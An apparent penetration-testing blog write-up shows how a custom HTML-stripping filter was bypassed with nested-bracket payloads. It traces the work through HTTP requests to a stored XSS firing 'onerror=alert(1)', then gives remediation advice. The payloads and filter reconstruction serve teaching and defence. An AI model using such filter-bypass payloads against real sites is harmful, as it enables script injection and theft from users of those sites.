Parsing And Filtering HTML To Prevent XSS Is Difficult

By: Colin Murdoch

Typically, when an XSS vulnerability is detected, remediation efforts centre around sanitizing data on input where appropriate, as well as properly escaping data on server output based on the context it will be used in. While it may appear that sanitizing data on input is sufficient, any small mistake in the parsing logic can still leave the application wide open to XSS. Ultimately, sanitization of inputs should be used to enforce business logic, while sanitizing or escaping data on egress should be used to eliminate the XSS potential.
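
As a minimal sketch of escaping on egress, Python's standard library can escape a stored value for an HTML-body output context (the stored string below is just an example):

```python
import html

stored = '$$<b>hello</b>##'  # whatever was accepted and stored on input

# escape at the point of output, for the HTML-body context the value lands in
print(html.escape(stored))   # $$&lt;b&gt;hello&lt;/b&gt;##
```

Other output contexts (attribute values, JavaScript, URLs) each need their own escaping rules.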

In a recent engagement, the above scenario occurred and almost resulted in a faulty remediation effort being marked as successful, when in fact a complicated input chain could still result in XSS. This should serve as a reminder that any time the observable output from a server function exhibits strange quirks or behaviours for certain inputs, further probing may lead to successful exploitation. In this case, the client was notified that their remediation efforts were still faulty, allowing them to implement a proper fix.

The overall process of fuzzing the input is described below, highlighting the odd quirks in the output that can help identify potentially vulnerable endpoints. Note that there is further complexity in this specific scenario: the injection point (‘/api/store’) was filtered once when the input was sent, and filtered again on the vulnerable endpoint (‘/upload/view’).

## Step 1: Initial Fuzzing

The initial fuzzing process involves sending a simple payload with basic HTML markup and small mutations to identify how the application responds. The payload uses the characters ‘$$’ as a prefix and ‘##’ as a suffix to help determine how content is filtered by the server. Note that the payloads below are shown unescaped for readability, but URL encoding should normally be applied:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 33

vulnerable_field=$$<b>hello</b>##
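
For convenience, these mutations can also be scripted; below is a quick sketch using Python's third-party requests library (the host is hypothetical), which applies the URL encoding mentioned above automatically:

```python
import requests  # third-party: pip install requests

STORE_URL = 'https://target.example/api/store'  # hypothetical host

def store(payload: str) -> requests.Response:
    # requests form-encodes the dict as application/x-www-form-urlencoded,
    # URL-encoding the payload in the process
    return requests.post(STORE_URL, data={'vulnerable_field': f'$${payload}##'})

store('<b>hello</b>')
```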

After sending this request, the ‘vulnerable_field’ was returned with the value ‘$$hello##’. It appears that HTML tags are simply stripped, leaving only the inner content. What happens if the payload is prefixed with an extra ‘<‘?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

vulnerable_field=$$<<b>hello</b>##

The ‘vulnerable_field’ was now set to the value ‘$$’. Based on this, it would appear that the server is keeping count of where each ‘<‘ and ‘>’ bracket is observed, and excluding all content in between. Since there’s an extra ‘<‘ with no matching ‘>’, everything after the prefix is removed. It now seems impossible to write HTML tags at all, so there’s no chance of XSS, right? Can the parser be confused by adding the closing ‘>’ bracket before the first opening ‘<‘ bracket?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

vulnerable_field=$$><<b>hello</b>##

Now the ‘vulnerable_field’ returns the value ‘$$>’, so things aren’t looking great. Everything after the first ‘<‘ is still removed, because there is no matching ‘>’ bracket later in the payload. The server seems to be keeping accurate track of when and where each bracket is encountered, which still prevents the injection of valid HTML content. What happens if an empty ‘<>’ is sent to the server?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

vulnerable_field=$$<>hello##

The ‘vulnerable_field’ now returns the value ‘$$<>hello##’, which makes things a little more interesting. HTML injection may be possible, as both the ‘<‘ and ‘>’ characters can be output in succession. While there are still challenges to overcome to actually inject content between the brackets, it’s worth pursuing. Ideally, the server can be tricked into stripping out a chunk of data while leaving behind a valid HTML artefact.

Pursuing this further, what happens if a number of consecutive ‘<‘ characters are sent, followed by the same number of consecutive ‘b>’ sequences? The idea is that the ‘<b>’ in the middle is stripped, but this leaves behind another ‘<b>’, and so on. Will the parser get confused and accidentally miss an element?

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 41

vulnerable_field=$$<<<<<b>b>b>b>b>hello##

The ‘vulnerable_field’ returns the value ‘$$<<<b>b>b>hello##’! While this is not very well-formed, a ‘<b>’ element was successfully injected.
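
Before moving on, it's worth noting that one filter consistent with every observation so far is a fixed two-pass strip of non-empty ‘<...>’ pairs, followed by truncation at any ‘<‘ that never finds a closing ‘>’. This is only a guess at the server's actual logic, but a short Python sketch reproduces each result above:

```python
import re

def guessed_filter(value: str, passes: int = 2) -> str:
    """Hypothetical reconstruction of the server-side filter."""
    for _ in range(passes):
        # strip non-empty bracket pairs; an empty '<>' survives
        value = re.sub(r'<[^<>]+>', '', value)
    # drop everything from the first '<' that has no later '>'
    cut = value.find('<', value.rfind('>') + 1)
    return value if cut == -1 else value[:cut]

observations = {
    '$$<b>hello</b>##':         '$$hello##',
    '$$<<b>hello</b>##':        '$$',
    '$$><<b>hello</b>##':       '$$>',
    '$$<>hello##':              '$$<>hello##',
    '$$<<<<<b>b>b>b>b>hello##': '$$<<<b>b>b>hello##',
}
for sent, stored in observations.items():
    assert guessed_filter(sent) == stored
```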

## Step 2: Creating The POC

It appears that as long as the nesting depth is three or more, HTML tags can be injected into the value. The next payload cleans up the input to inject a properly bolded ‘hello’:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

vulnerable_field=$$<<<b>b>b>hello<<</b>/b>/b>##

This results in the ‘vulnerable_field’ being saved as ‘$$<b>hello</b>##’. Successful HTML injection! Unfortunately, upon browsing to the ‘/upload/view’ endpoint to trigger the actual XSS, the page only output the content ‘$$hello##’. The content was going through another round of filtering when viewed in the vulnerable location. The solution is conceptually simple, though it looks quite complex as a payload: the payload must be nested a second time, such that the first round of filtering stores a payload for the second round. However, due to slightly different parsing in the second stage, the server needs to store the value ‘$$<<<<b><b>hello<<<<b></b>##’, which the second stage of parsing then reduces to ‘$$<b>hello</b>##’. This can be achieved with the following payload:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

vulnerable_field=$$<<<<<<b>b>b><<<b>b>b>hello<<<<<<b>b>b><<<b>b>/b>##

Now, the ‘vulnerable_field’ is scrubbed and ultimately saved as ‘$$<<<<b><b>hello<<<<b></b>##’, as expected. When the ‘/upload/view’ page is viewed, another round of filtering is performed and the page outputs the content ‘$$<b>hello</b>##’, resulting in a bolded ‘hello’.

## Step 3: Weaponized Payload

To fully demonstrate that XSS was achievable, the classic ‘alert(1)’ payload is injected next using an ‘<img>’ element with an invalid source, with the stored value saved as ‘<<<<b><img src=1 onerror=alert(1)>’:

POST /api/store HTTP/2
Host: {host}
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

vulnerable_field=<<<<<<b>b>b><<<b>b>img src=1 onerror=alert(1)>><
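
As noted in step 1, the raw payload above would be URL-encoded before being sent; the encoded form can be produced with Python's standard library:

```python
from urllib.parse import quote_plus

payload = '<<<<<<b>b>b><<<b>b>img src=1 onerror=alert(1)>><'
print('vulnerable_field=' + quote_plus(payload))
```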

Finally, browsing to the vulnerable ‘/upload/view’ page triggers the stored XSS vulnerability, displaying the alert on the page:
![XSS Alert]

Hopefully this is a good lesson for penetration testers on the importance of perseverance when a backend server behaves strangely with certain inputs, even if it’s not immediately exploitable. With some time and a clever enough payload, exploitation is often possible.

From a developer perspective, this goes to show that simple tests which satisfy remediation efforts may not always be enough, and that custom solutions to well-solved problems may not be the best answer. Use standard frameworks, and properly escape all user-controlled data for the output context it lands in, so that it is always treated as data and never as code; this prevents XSS and keeps applications safe.
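
As an illustration, most modern template engines handle this escaping automatically; a minimal sketch using Jinja2's autoescaping:

```python
from jinja2 import Environment  # third-party: pip install jinja2

env = Environment(autoescape=True)
template = env.from_string('<p>{{ comment }}</p>')

# the user-controlled value is escaped to &lt;img ...&gt; and rendered as text
print(template.render(comment='<img src=1 onerror=alert(1)>'))
```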

Finally, the simplest input sanitization or validation solutions may sometimes be the best. Rather than creating complex parsers that attempt to strip away custom patterns with multiple different implementations, it’s often easier to create a whitelist (or blacklist) of characters and check the input for any violations. When a violation is detected, either strip the character or reject the request entirely, forcing the user to submit only valid data. This approach requires only a single pass over the input data, and ensures potentially dangerous characters are never ingested. Attributes and other metadata abstractions can define these rules at the data source, ensuring the validation logic is written only once. It’s more performant, forces the definition of business requirements across all data points, and ultimately leads to more robust application designs.
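
A minimal sketch of such a single-pass allowlist check (the permitted character set here is hypothetical and would be driven by each field's business rules):

```python
import re

# hypothetical allowlist for a free-text field: letters, digits, spaces,
# and basic punctuation; '<', '>', quotes, and the rest are rejected outright
ALLOWED = re.compile(r"[A-Za-z0-9 .,!?-]*")

def validate(value: str) -> str:
    # single pass over the input: reject rather than attempt to repair
    if not ALLOWED.fullmatch(value):
        raise ValueError('input contains disallowed characters')
    return value
```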